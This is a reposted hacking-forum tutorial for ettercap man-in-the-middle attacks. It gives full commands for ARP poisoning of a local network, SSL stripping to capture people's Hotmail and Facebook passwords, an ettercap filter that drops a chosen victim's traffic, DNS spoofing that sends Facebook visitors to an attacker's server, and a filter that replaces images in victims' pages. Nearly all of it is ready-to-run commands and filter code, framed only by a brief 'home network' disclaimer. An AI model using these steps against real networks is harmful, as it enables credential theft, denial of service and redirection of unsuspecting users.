----I DID NOT MAKE THIS TUTORIAL I originally had the tutorial saved from another forum but when the forum was replaced and the tutorial was gone I decided to repost it here so other people could see it----Only test this on your home network no where else. This guide is more of a reference for launching a man in the middle attack to view the traffic of victims on the network using ettercap along with sslstrip to strip out the important encrypted http traffic. I have done this on wired and wireless LANs using Backtrack5.
To begin we want to enable packet forwarding with this command:
echo 1 > /proc/sys/net/ipv4/ip_forwardThen cat the file to see if it is enabled or not. The command output of 1 meaning enabled and 0 meaning not enabled.
cat /proc/sys/net/ipv4/ip_forwardWe will now edit our etter.conf configuratin file to use ip tables. In backtrack the file is located.
/etc/etter.confUncomment the two commented lines following the statement: if you use iptables by removing the two bottom comment hashes you see below((remove the two bright red things) but make sure to leave the one beside the words "if you use ip tables":
#if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"In the same file also change ec_uid and ec_gid numbers to zero so Ettercap runs as admin.
[
privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the defaultNow use this iptables command to adjust the nat table to route tcp traffic from 80 to 8080:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080Once we have scanned the network for targets and are aware of what IP addresses belongs to what we can begin the poisoning by Becomeing Man in the middle. The following will start ettercap using a range of ip addresses along with the autoadd plugin which means victims who join the network or reconnect to it after you began the scan will be poisoned as well. In this example 192.168.1.1 is the router and ettercap will poison targets up to 192.168.1.5 Also if you are on a wireless network all you have to do is specify ettercap to use your wireless interface with -i wlan0 . wlan0 is my wireless interface.
sudo ettercap -Tq -M arp:remote /192.168.1.1-5/ -P autoaddor less specific. This poisons everyone in subnet but be careful this can bring a network to a crawl:
ettercap -TqM ARP:REMOTE // //Now tell sslstrip to listen(-l) on p 8080:
sslstrip -a -l 8080Now watch people's hotmail,facebook and any other passwords that are suppsoedly protected by ssl roll in as they login. Ettercap will display the output. Now lets dig deeper and manipulate people's packets as they are routed through our computer.
DOS Attacking with Ettercap
First off always re-enable packetforwarding because by default it will turn off when you stop an Ettercap poison. Here is the command:
echo 1 > /proc/sys/net/ipv4/ip_forwardNow lets do a DOS attack with ettercap. First thing we want to do is create a file with instructions to drop packets from and to a target host. Make a file called dos.eft
Put these lines of code in it but make sure to change both “TargetIP†fields to that of your victim.
if (ip.src == ‘Target IP’ || ip.dst == ‘Target IP’) {
drop();
kill();
msg(“Packet Dropped\nâ€ÂÂ);
}Go to the directory you saved your file/script in and compile it into an ettercap filter with this command:
etterfilter dos.eft -o dos.efLastly we become man in the middle.
-F specifies what filter we want to use. In this case:
it’s dos.efI was targeting 192.168.1.112 so I chose it for this example:
ettercap -T -q -F dos.ef -M ARP /192.168.1.112/ // -i (network interface)You should see Ettercap displaying lots of “Packet Dropped†messages. ;-)
DNS Spoofing
(Redirecting victim to sites of our choosing with Ettercap)
Now lets redirect our victim to websites of our choosing. First open a new console and change to our dns configuration file located in the following directory:
/usr/share/ettercapEnter the following command to open the configuration file so we can edit it, I use gedit to edit it but you can use many other programs such as gedit:
gedit etter.dnsNow see the line that says:
microsoft.com A 198.182.196.56That line will redirect the victim to 198.182.196.56 if they attempt to visit microsoft.com
I will give you an example by showing you I can redirect the victim to my own malicious web server running on my IP address (192.168.1.118) if they attempt to visit lets say
http://www.facebook.com This example also uses a wildcard (*)We do this by adding the following line:
*.facebook.com A 192.168.1.118Save it. Now We can issue the actual command that begins Ettercap and uses the dns spoofing addon:
ettercap -T -q -M arp:remote -P dns_spoof //or if we want to target a specific victim IP address use this:
ettercap -i yourinterface -T -q -P dns_spoof -M ARP /herevictimslocalip/ //Leave that running. The output that ettercap displays will clearly notify you as people are redirected.
Change pictures the victim sees as they browse the web
(using an Ettercap filter of course)
Ok this section I will teach you how to work with filters in Ettercap and ultimately change the pictures people see in there browser to ones we have selected. To create your own filters you need to learn the basics of how programming languages work but for this example I will give you one that I got from the helpful hackers at greyhat security.
Create/edit a new file using the following command:
gedit filter.picCopy and paste the following into it. But you must change the text in red to the url of your own images that you have uploaded using your favorite image uploader such as tinypic.com or imageshack.com
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("Modified Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}
if (ip.proto == UDP && udp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}Save and close. In that same console session, run the following command to turn the code into a filter that is readable by Ettercap:
etterfilter filter.pic -o filter.efNow we finally issue the Ettercap command that begins the MitmM attack and use the picture filter that we have created:
sudo ettercap -T -q -F filter.ef -M arp:remote // -P autoaddNote: Remember to enable packet forwarding before using any of attacks I mentioned in this guide. It was mentioned in the first tutorial (ssl strip tute) but here is the command again:
echo 1 > /proc/sys/net/ipv4/ip_forward
TAKEN FROM :http://www.hackcommunity.com/Thread-Ettercap-Man-In-The-MIddle-Attack-SSL-Strip
